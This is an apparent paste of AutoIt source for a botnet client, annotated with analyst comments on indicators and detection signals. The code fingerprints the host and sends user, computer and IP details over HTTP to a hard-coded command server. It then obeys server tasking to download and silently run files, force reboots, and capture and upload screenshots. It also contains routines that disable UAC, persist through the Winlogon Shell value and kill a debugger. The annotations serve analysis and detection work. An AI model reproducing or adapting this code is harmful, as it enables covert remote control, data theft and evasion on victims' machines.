bedtech891

botnet_Sorce

Mar 26th, 2021
  1. #NoTrayIcon
  2. ;#RequireAdmin
  3. #include <File.au3>
  4. #include <Misc.au3>
  5. #include <string.au3>
  6. #include <crypt.au3>
  7. #include <ScreenCapture.au3>
  8.  
  9. ;Mutex
  10. ;------
      ; NOTE(analysis): the single-instance check is commented out in this paste, so
      ; nothing in the visible code prevents several copies from running at once.
  11.  
  12. ;Singleton("7563545689855477")
  13.  
  14. ;HWID
  15. ;------
      ; NOTE(analysis): id() returns a StringSplit() array. Elements [1] and [2] are
      ; later sent to the server as "username"/"password" and [2] is used as the
      ; upload filename, so together they act as the per-host identifier.
  16.  
  17. Global $hwid = id()
  18.  
  19. ;disable uac
  20. ;------
      ; NOTE(analysis): the call inside this branch is commented out, so the branch
      ; is a no-op in this paste even when the process is elevated.
  21.  
  22. if IsAdmin() Then
  23.     ;_Disable_UAC()
  24. EndIf
  25.  
  26. ;SETTING VARIABLES
  27. ;------
      ; NOTE(analysis): hard-coded server location. Host, directory and the three PHP
      ; endpoint names are the network indicators for this sample; the scheme is plain
      ; HTTP, so the traffic is visible to a proxy or IDS without TLS inspection.
  28. $mainHome      =             "http://jlibs8080.no-ip.biz"    ;main domain
  29. $mainDir      =             "/bnt2/"
  30. $upshot      = $mainHome & $mainDir &    "u.php"            ;path to upload file
  31. $serverHome     = $mainHome & $mainDir &    "s.php"            ;path to server file
  32. $cmdDir      = $mainHome & $mainDir &    "dir.php"            ;path to commandDir file
  33.  
  34. ;------above = url[/]------below = local path[\]------
      ; NOTE(analysis): both paths are appended to @TempDir elsewhere in the script, so
      ; the staging directory and the log file are host indicators under the user's
      ; temp folder.
  35. $subDir      = "\n0625d6982e9krf824\"
  36. $filei      = "\jhgr78.log"            ;update log - make random VIA builder
  37.  
  38. ;------
  39. $interv      = 5
  40. $counter      = $interv * 1000 * 60            ;interval in ms: 5 * 1000 * 60 = 5 minutes (the original comment said 15)
  41. ;------
  42.  
  43. $timeInit = TimerInit()
  44. Global $result
  45. Global $ip     = @IPAddress1
  46. ;Do On Start Up
  47. ;------
      ; NOTE(analysis): the self-relocation (FileMove), the HKLM ...\CurrentVersion\Run
      ; write and the _Run() call below are all commented out, so as pasted the only
      ; start-up action that touches disk is creating the staging directory.
  48.  
  49. ;FileMove(@ScriptFullPath, @TempDir & $subDir &  "hvn.exe", 9)
  50.  
  51. if(FileExists(@TempDir & $subDir) <> 1) Then
  52.    DirCreate(@TempDir & $subDir)
  53. EndIf
  54.  
  55. ;$reg = RegWrite('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', @ScriptName, 'REG_SZ', @TempDir & $subDir & 'hvn.exe')
  56. ;_Run(@ScriptFullPath)
  57.  
  58. ;Anti Debugger
  59. ;------
      ; NOTE(analysis): one-shot check at start-up for a single process name; a match
      ; is closed with ProcessClose(). No other analysis tool is checked for here.
  60.  
  61. $process = "OLLYDBG.EXE"
  62.  
  63. If ProcessExists($process) Then
  64.    ProcessClose($process)
  65. EndIf
  66.  
  67. ;Initial update
  68. ;------
      ; NOTE(analysis): first check-in happens immediately at launch; the return value
      ; of this call is discarded, so any tasking in the first response is not acted on.
  69.  
  70. _Update($filei)
  71.  
  72. ;UPDATE
  73. ;------
  74. While 1
      ; NOTE(analysis): polling loop. The inner loop wakes every 50 ms and checks the
      ; elapsed timer; once it exceeds $counter it checks in with the server and
      ; processes the response as tasking. ExitLoop leaves only the inner loop, and
      ; the outer loop re-enters it immediately.
  75.    While 1
  76.  
  77.       $updateTime = TimerDiff($timeInit)
  78.  
  79.       if $updateTime > $counter Then
  80.       ;ConsoleWrite("test")
  81.       ;$command     = InetRead($cmdDir,1)
      ; The response body of the check-in POST is the command string.
  82.       $Command      = _Update($filei)
  83.  
      ; A response of "-1", or one starting with "<br", is treated as "no tasking":
      ; the next check-in is rescheduled to a random 5-30 minute interval, so beacon
      ; timing is jittered rather than fixed after the first idle response.
  84.       if $command == "-1" Or StringLeft($command,3)  == "<br" Then
  85.  
  86.       $interv     = Random(5,30,1)
  87.       $counter     = $interv * 1000 * 60
  88.       $timeInit     = TimerInit()
  89.       ExitLoop
  90.  
  91.       EndIf
  92.  
      ; Response format as parsed here: records separated by "|", fields within a
      ; record separated by ",". Field 1 is a numeric opcode, later fields are its
      ; arguments. The parsed table is a global 2-D array with 10 columns.
      ; Note that $process, which earlier held the debugger process name, is reused.
  93.       $process    = BinaryToString($command)
  94.       $comS      = StringSplit($process,"|")
  95.       $uComs     = UBound($comS) - 1
  96.       Global $commandVal[$uComs+1][10]
  97.  
  98.       for $j = 1 to $uComs
  99.  
  100.       $cMas     = StringSplit($comS[$j],",")
  101.       $uCmas = UBound($cMas) - 1
  102.  
  103.       for $l = 1 to $uCmas
  104.  
  105.             $commandVal[$j][$l] = $cMas[$l]
  106.  
  107.       Next
  108.       Next
  109.  
  110.       $uCommandVal = UBound($commandVal)-1
  111.  
      ; Opcode dispatch. Everything the server returns is acted on as-is: the visible
      ; code performs no authentication or integrity check on the tasking.
  112.       for $j = 1 to $uCommandVal
  113.  
  114.       Switch $commandval[$j][1]
  115.  
      ; 1: fetch field 2 (URL) to field 3 (file name), then launch it with field 4 as parameters.
  116.             Case 1
  117.  
  118.              _DlnEx($commandval[$j][2],$commandval[$j][3],1,1,$commandval[$j][4]) ;DL n EX
  119.  
      ; 2: fetch only, no launch.
  120.             Case 2
  121.  
  122.              _DlnEx($commandval[$j][2],$commandval[$j][3],1) ;DL
  123.  
      ; 3: launch a file name relative to the staging directory, no fetch.
  124.             Case 3
  125.  
  126.              _DlnEx("",$commandval[$j][3],0,1,$commandval[$j][4])
  127.  
      ; 4: Shutdown(6) is AutoIt's reboot (2) combined with force (4).
  128.             Case 4
  129.  
  130.              ;haha($commandval[$j][1])
  131.              Shutdown(6)
  132.  
      ; 5: full-screen capture written to the script's own directory under a random
      ; numeric .jpg name, uploaded, then every *.jpg in that directory is deleted
      ; (not only the capture just taken).
  133.             Case 5
  134.  
  135.              $scrnName = Random(12,999999,1) & ".jpg"
  136.              _ScreenCapture_Capture(@ScriptDir & "\" & $scrnName)
  137.              ScrnUp($scrnName)
  138.              FileDelete(@ScriptDir & "\" & "*.jpg")
  139.  
  140.       EndSwitch
  141.  
  142.       Next
  143.  
  144.       ;//////---end of update---//////
  145.       ;reset time
  146.       ;------
      ; After tasking has been processed the interval is left unchanged (the
      ; re-randomisation below is commented out); only the timer is restarted.
  147.  
  148.       ;$interv     = Random(5,30,1)
  149.       ;$counter     = $interv * 1000 * 60
  150.       Sleep(500)
  151.       $timeInit = TimerInit()
  152.       EndIf
  153.  
  154.       Sleep(50)
  155.  
  156.    WEnd
  157. WEnd
  158. ;//////---Functions---//////
  159.  
  160. ;------
  161. ;HWID
  162.  
  163. func id()
       ; Builds the per-host identifier used by the rest of the script.
       ; Inputs are all local machine attributes: CPU architecture, keyboard layout,
       ; the C: volume serial, and the type and total size of the system drive.
       ; The concatenation (plus a hex-encoded reversed copy of its second half) is
       ; hashed with MD5, and two substrings of the hash result are returned as a
       ; StringSplit() array: [0] = count, [1] and [2] = the two parts.
       ; NOTE(analysis): nothing random or time-based goes into the value, so the same
       ; machine should produce the same identifier on every run, which helps when
       ; correlating check-ins from one host.
  164.    $disc = StringLeft(@SystemDir, 3)
  165.    $start = "0" & @CPUArch & @KBLayout & DriveGetSerial("C:\") & StringUpper(DriveGetType($disc)) & DriveSpaceTotal ($disc)
  166.    $hwid1  = StringMid($start, Round(StringLen($start)/2), Round(StringLen($start)/2))
  167.    $hwid2 = _StringToHex(stringReverse($hwid1))
  168.    $final = $start & $hwid2
  169.    $start = _Crypt_HashData($Final,$CALG_MD5)
       ; The two slices start at positions 1 and 8, so they share the character at position 8.
  170.    $epicFinal = StringMid($start,1,8)  & ":" &  StringMid($start,8,16)
  171.  
  172.    Return StringSplit($epicFinal, ":")
  173. EndFunc
  174.  
  175. ;------
  176. ;MUTEX
  177.  
  178. Func Singleton($semaphore)
       ; Single-instance guard: creates a named semaphore through kernel32
       ; CreateSemaphore and exits the process with code -1 when GetLastError reports
       ; 183 (ERROR_ALREADY_EXISTS), i.e. another instance already owns the name.
       ; $semaphore - name of the semaphore object.
       ; NOTE(analysis): the only call to this function in the script is commented
       ; out. If it were enabled, the semaphore name passed there would be a host
       ; indicator visible in a handle listing.
  179.     Local $ERROR_ALREADY_EXISTS = 183
  180.     DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $semaphore)
  181.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  182.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then Exit -1
  183. EndFunc
  184.  
  185. ;------
  186. ;Disable UAC
  187.  
  188. Func _Disable_UAC()
       ; Writes two policy values that weaken User Account Control:
       ; ConsentPromptBehaviorAdmin = 0 and EnableLUA = 0 under
       ; HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
       ; (using the HKLM64 hive name on 64-bit systems).
       ; Returns True only when both RegWrite calls report success, otherwise False.
       ; NOTE(analysis): the only call site is commented out in this paste. Writes to
       ; either value by a non-administrative tool are a high-signal event for
       ; registry auditing or EDR rules; both need an elevated process to succeed.
  189.     If @OSArch = "X64" Then
  190.       $pref = "64"
  191.     Else
  192.       $pref = ""
  193.     EndIf
  194.     $r1 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"ConsentPromptBehaviorAdmin", "REG_DWORD", "0")
  195.     $r2 = RegWrite("HKLM" & $pref & "\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" ,"EnableLUA", "REG_DWORD", "0")
  196.     Sleep(500)
       ; RegWrite returns 1 on success, so a sum of 2 means both writes succeeded.
  197.     If $r1 + $r2 = 2 Then
  198.       Return True
  199.     Else
  200.       Return False
  201.     EndIf
  202. EndFunc
  203.  
  204. ;------
  205. ;StartUp
  206.  
  207. Func _run($file, $type = 1)
       ; Persistence routine: if the script's file name is not already present in the
       ; Winlogon "Shell" value, copies $file into @WindowsDir under the script's name
       ; and appends ",<name>" to that value.
       ; $file - path of the file to copy.
       ; $type - not used anywhere in the body.
       ; Returns the RegWrite result when a write was attempted, otherwise False.
       ; NOTE(analysis): the only call site is commented out in this paste. For
       ; detection, a Winlogon Shell value holding anything besides the expected shell
       ; is worth alerting on, as is a new executable appearing directly in the
       ; Windows directory; both operations require administrative rights.
  208.    $ret = False
  209.    $arun = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
  210.    if StringInStr($arun, @ScriptName) = 0 Then
  211.       $name = @ScriptName
  212.       FileCopy($file, @WindowsDir & "\" & $name, 1)
  213.       $ret = RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", $arun & "," & $name)
  214.    EndIf
  215.    Return $ret
  216. EndFunc
  217.  
  218. ;------
  219. ;update
  220.  
  221. Func _Update($updateFile)
       ; Check-in routine: gathers host details, sends them to the server and returns
       ; the response text, which the main loop treats as tasking.
       ; $updateFile - log file path relative to @TempDir; its content is included in
       ;               the request and the file is deleted afterwards.
       ; Data leaving the host in each request: the two identifier parts from $hwid,
       ; OS version, the log file content, the first local IP address, the logged-on
       ; user name and the computer name.
       ; NOTE(analysis): for network detection, the request is a plain-HTTP POST with
       ; Content-Type application/x-www-form-urlencoded whose body begins with
       ; "&username=" and carries the fields in a fixed order
       ; (username, password, os, oigh, ip, name, compName).
  222.  
  223. Global $ip     = @IPAddress1
  224. $compName     = @ComputerName
  225. $os      = @OSVersion
  226. $userName     = @UserName
  227. $Name      = $hWID[1]
  228. $password    = $hwid[2]
  229.  
  230. $memStats = MemGetStats()
  231.  
       ; A memory-load line is appended to the log on every check-in, so the log is
       ; never empty when it is read back below.
  232. _FileWriteLog(@TempDir & $updateFile, "Percent memery usage - " & $memStats[0] & " # ")
  233.  
  234. $infoz     = FileOpen(@TempDir & $updateFile)
  235. $infozz = FileRead($infoz)
  236.  
  237. $serverdata = '&username=' & $name & '&password=' & $password & '&os=' & $os & '&oigh=' & $infozz & '&ip=' & $ip & '&name=' & $userName & '&compName=' & $compName
       ; Third argument False = synchronous request through the WinHTTP COM object.
  238. $oHTTP = ObjCreate("winhttp.winhttprequest.5.1")
  239. $oHTTP.Open("POST", $serverHome, False)
  240. $oHTTP.SetRequestHeader("Content-Type","application/x-www-form-urlencoded")
  241. $oHTTP.Send($serverdata)
  242. $oReceived = $oHTTP.ResponseText
  243. FileClose($infoz)
  244.  
  245. ConsoleWrite($oReceived & @CRLF)
  246.  
       ; The log is removed after each check-in, so on disk it only exists between
       ; check-ins; its content is preserved in the outbound request, not locally.
  247. FileDelete(@TempDir & $updateFile)
  248. Return $oReceived
  249. ;Exit
  250. EndFunc
  251.  
  252. ;------
  253. ;DL n EX
  254.  
  255. Func _DlnEx($DlURL="",$DlFileName="",$DwnL = 0,$DlnEx = 0,$exeParams="")
       ; Download and/or launch routine driven by server tasking.
       ; $DlURL      - URL to fetch (used only when $DwnL is 1).
       ; $DlFileName - file name, stored in and launched from @TempDir & $subDir.
       ; $DwnL       - 1 to download.
       ; $DlnEx      - 1 to launch the file.
       ; $exeParams  - parameters passed to the launched file.
       ; No return value; the outcome string is written to the log file that the next
       ; check-in sends to the server.
       ; NOTE(analysis): URL, file name and parameters all come from the server
       ; response and are used without any validation or signature check in the
       ; visible code. Host-side signals: a new file in the staging directory under
       ; the user's temp folder followed by a hidden-window process start from that
       ; directory.
  256.  
  257.    $result = ""
  258.  
  259.       If $Dwnl == 1 Then
  260.       $dlget = InetGet($DlURL,@TempDir & $subDir & $DlFileName)
  261.       InetClose($dlget)
  262.  
  263.       If $dlget <> 0 Then
  264.       $result &= "dl-succ-" & $DlFileName
  265.       Else
  266.       $result &= "dl-error-fail-" & $DlFileName
  267.       EndIf
  268.       EndIf
  269.  
  270.       If $DlnEx == 1 Then
  271.  
       ; Launched with the staging directory as working directory and @SW_HIDE, so no
       ; window is shown to the user.
  272.       ShellExecute($DlFileName,$exeParams,@TempDir & $subDir,"open",@SW_HIDE)
  273.       Sleep(500)
  274.  
       ; Success is judged by a process with the same name existing 500 ms later; its
       ; PID is reported back in the log line.
  275.       $dlNexPrcExs = ProcessExists($DlFileName)
  276.  
  277.       If $dlNexPrcExs <> 0 Then
  278.       $result &= "-exe-true-" & $DlFileName & "-pid=" & $dlNexPrcExs & "-"
  279.       Else
  280.       $result &= "-exe-FAIL-To-Start-" & $DlFileName
  281.       EndIf
  282.  
  283.       EndIf
  284.  
  285.    _FileWriteLog(@TempDir & $filei, $result)
  286.  
  287. EndFunc
  288.  
  289. ;------
  290. ;upload scrnshot
  291.  
  292. Func ScrnUp($scrnFile)
       ; Uploads a captured screenshot to the server's upload endpoint ($upshot).
       ; $scrnFile - file name of the capture, relative to @ScriptDir.
       ; The file is read in binary mode (FileOpen flag 16) and placed in a
       ; hand-built multipart/form-data body; the form field is "file[]" and the
       ; filename sent is the second identifier part from $hwid, not the local name.
       ; The server response is stored in $oReceived but not used or returned.
       ; NOTE(analysis): for network detection, the body uses the fixed boundary
       ; string "a65h7a" and labels the image part "Content-Type: txt/html"; both are
       ; constant across uploads from this sample.
  293.  
  294. Local $picOpen      = FileOpen(@ScriptDir & "\" & $scrnFile,16)
  295. Local $picRead      = FileRead($picOpen)
  296. Local $boundary     = "a65h7a"             & @CRLF
  297. Local $boundary2     = "--" & $boundary
  298. Local $binary      = "Content-Transfer-Encoding: binary"     & @CRLF
  299. local $typeCon      = "Content-Type: txt/html"             & @CRLF & @CRLF
  300.  
  301. Local $postData = $boundary2
  302.  
       ; $binary is declared above but never added to the body.
  303.       $postData &= 'Content-Disposition: form-data; name="file[]"; filename="' & $hwid[2] & '"' & @CRLF
  304.       $postData &= $typeCon
  305.       $postData &= $picRead & @CRLF
  306.       $postData &= "--a65h7a--";End of HTTP HEADER
  307.  
  308. $oHTTP = ObjCreate("winhttp.winhttprequest.5.1")
  309. $oHTTP.Open("POST", $upshot, False)
  310. $oHTTP.SetRequestHeader("Content-Type", "multipart/form-data; boundary=" & $boundary)
  311. $oHTTP.Send($postData)
  312. $oReceived = $oHTTP.ResponseText
  313.  
  314. FileClose($picOpen)
  315.  
  316. EndFunc
  317. ;------
  318. ;debug purposes
  319. func haha($var)
       ; Debug helper: writes a fixed marker line and then $var to the console.
       ; The only call to it in the script is commented out.
  320.  
  321. ConsoleWrite("haha it worked" & @CRLF)
  322. ConsoleWrite($var & @CRLF)
  323.  
  324. EndFunc